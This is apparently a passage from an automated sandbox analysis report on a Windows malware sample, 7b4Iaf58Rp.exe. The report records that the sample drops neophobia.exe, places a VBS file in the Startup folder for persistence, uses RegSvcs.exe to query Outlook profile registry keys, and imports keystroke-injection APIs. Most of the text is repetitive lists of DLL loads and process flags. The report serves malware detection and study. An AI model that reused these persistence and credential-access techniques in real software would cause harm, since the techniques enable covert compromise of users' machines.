Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 7b4Iaf58Rp.exe

Static file information: File size 1125888 > 1048576

Source: 7b4Iaf58Rp.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 7b4Iaf58Rp.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 7b4Iaf58Rp.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 7b4Iaf58Rp.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 7b4Iaf58Rp.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 7b4Iaf58Rp.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 7b4Iaf58Rp.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000007.00000002.2664241495.0000000002EB9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2664119117.0000000002763000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: neophobia.exe, 00000002.00000003.1494562152.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000002.00000003.1494436080.0000000003990000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000004.00000003.1525158722.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000004.00000003.1525781731.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000006.00000003.1567516685.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000006.00000003.1569671446.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 0000000A.00000003.1647543407.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 0000000A.00000003.1644978259.0000000003600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: neophobia.exe, 00000002.00000003.1494562152.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000002.00000003.1494436080.0000000003990000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000004.00000003.1525158722.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000004.00000003.1525781731.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000006.00000003.1567516685.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 00000006.00000003.1569671446.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 0000000A.00000003.1647543407.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, neophobia.exe, 0000000A.00000003.1644978259.0000000003600000.00000004.00001000.00020000.00000000.sdmp

Source: 7b4Iaf58Rp.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 7b4Iaf58Rp.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 7b4Iaf58Rp.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 7b4Iaf58Rp.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 7b4Iaf58Rp.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00F94B37 LoadLibraryA,GetProcAddress,

0_2_00F94B37

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FB8945 push ecx; ret	0_2_00FB8958
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D68945 push ecx; ret	2_2_00D68958
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041C40C push cs; iretd	7_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041C50E push cs; iretd	7_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040E21D push ecx; ret	7_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041C6BE push ebx; ret	7_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DD4A8D push edi; retf	7_2_02DD4A8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02704A8D push edi; retf	11_2_02704A8E

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

File created: C:\Users\user\AppData\Local\scrolar\neophobia.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs

Jump to behavior

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00F948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_00F948D7
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_01015376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_01015376
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_00D448D7
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DC5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_00DC5376

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FB3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00FB3187

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
